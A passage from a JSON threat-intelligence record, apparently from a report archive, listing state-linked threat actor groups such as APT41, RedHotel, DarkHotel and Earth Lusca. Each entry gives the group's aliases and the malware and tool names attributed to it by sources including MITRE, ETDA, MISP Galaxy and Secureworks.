			"created_at": "2023-01-06T13:46:39.138138Z",
			"updated_at": "2026-04-10T02:00:03.227223Z",
			"deleted_at": null,
			"main_name": "Higaisa",
			"aliases": [],
			"source_name": "MISPGALAXY:Higaisa",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a",
			"created_at": "2023-09-07T02:02:47.827633Z",
			"updated_at": "2026-04-10T02:00:04.873323Z",
			"deleted_at": null,
			"main_name": "RedHotel",
			"aliases": [
				"Operation FishMedley",
				"RedHotel",
				"TAG-22"
			],
			"source_name": "ETDA:RedHotel",
			"tools": [
				"Agentemis",
				"BIOPASS",
				"BIOPASS RAT",
				"BleDoor",
				"Brute Ratel",
				"Brute Ratel C4",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"POISONPLUG.SHADOW",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"ShadowPad Winnti",
				"SprySOCKS",
				"Spyder",
				"Winnti",
				"XShellGhost",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "452d2d74-e812-45d6-b0fe-b8a6cc4ebd01",
			"created_at": "2022-10-25T16:07:23.562676Z",
			"updated_at": "2026-04-10T02:00:04.662064Z",
			"deleted_at": null,
			"main_name": "Earth Berberoka",
			"aliases": [
				"GamblingPuppet"
			],
			"source_name": "ETDA:Earth Berberoka",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"AsyncRAT",
				"CinaRAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"PuppetLoader",
				"Quasar RAT",
				"QuasarRAT",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"Xamtrav",
				"Yggdrasil",
				"oRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "30c9c492-afc6-4aa1-8fe6-cecffed946e0",
			"created_at": "2022-10-25T15:50:23.400822Z",
			"updated_at": "2026-04-10T02:00:05.350302Z",
			"deleted_at": null,
			"main_name": "Higaisa",
			"aliases": [
				"Higaisa"
			],
			"source_name": "MITRE:Higaisa",
			"tools": [
				"PlugX",
				"certutil",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c0cedde3-5a9b-430f-9b77-e6568307205e",
			"created_at": "2022-10-25T16:07:23.528994Z",
			"updated_at": "2026-04-10T02:00:04.642473Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"APT-C-06",
				"ATK 52",
				"CTG-1948",
				"Dubnium",
				"Fallout Team",
				"G0012",
				"G0126",
				"Higaisa",
				"Luder",
				"Operation DarkHotel",
				"Operation Daybreak",
				"Operation Inexsmar",
				"Operation PowerFall",
				"Operation The Gh0st Remains the Same",
				"Purple Pygmy",
				"SIG25",
				"Shadow Crane",
				"T-APT-02",
				"TieOnJoe",
				"Tungsten Bridge",
				"Zigzag Hail"
			],
			"source_name": "ETDA:DarkHotel",
			"tools": [
				"Asruex",
				"DarkHotel",
				"DmaUp3.exe",
				"GreezeBackdoor",
				"Karba",
				"Nemain",
				"Nemim",
				"Ramsay",
				"Retro",
				"Tapaoux",
				"Trojan.Win32.Karba.e",
				"Virus.Win32.Pioneer.dx",
				"igfxext.exe",
				"msieckc.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2664d6f5-f918-4978-87f8-f6afad7402c6",
			"created_at": "2023-01-06T13:46:39.393669Z",
			"updated_at": "2026-04-10T02:00:03.312065Z",
			"deleted_at": null,
			"main_name": "Earth Berberoka",
			"aliases": [
				"GamblingPuppet"
			],
			"source_name": "MISPGALAXY:Earth Berberoka",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434391,
	"ts_updated_at": 1775826768,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.pdf",
		"text": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.txt",
		"img": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.jpg"
	}
}